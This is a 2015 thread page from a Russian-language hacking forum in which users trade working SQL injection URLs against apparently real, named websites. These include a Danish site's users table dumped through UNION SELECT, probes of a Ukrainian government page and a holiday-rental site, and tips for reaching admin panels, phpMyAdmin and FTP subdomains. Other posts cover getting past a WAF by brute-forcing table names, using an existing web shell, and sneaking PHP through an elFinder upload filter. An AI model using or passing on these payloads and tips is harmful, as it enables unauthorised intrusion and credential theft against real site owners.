HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #441  
Старый 10.08.2015, 15:17
Chudak
Guest
Сообщений: n/a
Провел на форуме:
404

Репутация: 0
По умолчанию

Код:
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
version 5.1.72-cll-lve

Помогите. WAF фильтрует information_schema.tables. Как обойти?
 
Ответить с цитированием

  #442  
Старый 10.08.2015, 17:33
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?

Код:
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
 
Ответить с цитированием

  #443  
Старый 10.08.2015, 17:44
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:

Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?
Код:
Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+
https://rdot.org/forum/showthread.php?t=156
 
Ответить с цитированием

  #444  
Старый 11.08.2015, 02:14
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от djon  
djon said:

Нашел такое
www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&p wd=123123&fn=1
это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"
test@mail.ru
","nickname":"test","profileId":"6434","password": "7534534583eeffa8377c4d","freeze":"0","opo_userid" :"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так
тут будет форма
({"email":"
test@mail.ru
","nickname":"test","profileId":"6434","password": "7534534583eeffa8377c4d","freeze":"0","opo_userid" :"133"})
И ява скрипты не исполняются почему то.
Что можно с этим сделать?
Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.

Цитата:
Сообщение от Pro100Nyan  
Pro100Nyan said:

Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini
Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?

Цитата:
Сообщение от Chudak  
Chudak said:

Код:
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version(),1,1)))='53
version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти?
Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы
 
Ответить с цитированием

  #445  
Старый 11.08.2015, 03:06
Pro100Nyan
Guest
Сообщений: n/a
Провел на форуме:
1367

Репутация: 0
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:

Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?
которые dns, те что сайты)
 
Ответить с цитированием

  #446  
Старый 11.08.2015, 17:39
blackhead
Guest
Сообщений: n/a
Провел на форуме:
5407

Репутация: 0
По умолчанию

Нашел вот такую уязвимость

Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--


Нашел username,password но админку так и не смог найти((

Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--


Записать файл не получается.

Что нибудь можно тут сделать? Помогите начинающему
 
Ответить с цитированием

  #447  
Старый 11.08.2015, 20:07
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

Цитата:
Сообщение от blackhead  
blackhead said:

Нашел вот такую уязвимость
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9+--

Нашел username,password но админку так и не смог найти((
Код:
Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FROM+users+LIMIT+0,1+--

Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему
http://www.oscar-k.dk/content/index.php?signIn=1
 
Ответить с цитированием

  #448  
Старый 11.08.2015, 20:47
Muracha
Guest
Сообщений: n/a
Провел на форуме:
54593

Репутация: 0
По умолчанию

В админке сайта есть скрипт elFinder.

Пытаюсь через него загрузить php файл.

Скрипт, походу, читает заголовки mime т.к.

Файлы типа .php и html не пропускает. Если создать простейший скрипт аля

не пропустит.

Но если изображение переименовать в test.php то с легкостью загружает.

Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?

Если файл test.php переименовать в test.jpg не пропускает так же...
 
Ответить с цитированием

  #449  
Старый 11.08.2015, 20:52
t0ma5
Guest
Сообщений: n/a
Провел на форуме:
300820

Репутация: 90
По умолчанию

Цитата:
Сообщение от OxoTnik  
опередил) у него ещё wildcard как то хитро настроен, по идее ещё есть

phpmyadmin.oscar-k.dk

content.oscar-k.dk

ftp://ftp.oscar-k.dk
 
Ответить с цитированием

  #450  
Старый 11.08.2015, 20:53
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
29

Репутация: 0
По умолчанию

Цитата:
Сообщение от Muracha  
Muracha said:

В админке сайта есть скрипт elFinder.
Пытаюсь через него загрузить php файл.
Скрипт, походу, читает заголовки mime т.к.
Файлы типа .php и html не пропускает. Если создать простейший скрипт аля
не пропустит.
Но если изображение переименовать в test.php то с легкостью загружает.
Как правильно переименовать внутренности, чтобы файл jpg он воспринял как php или наоборот?
Если файл test.php переименовать в test.jpg не пропускает так же...
Проверьте, не фильтрует ли конструкцию
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ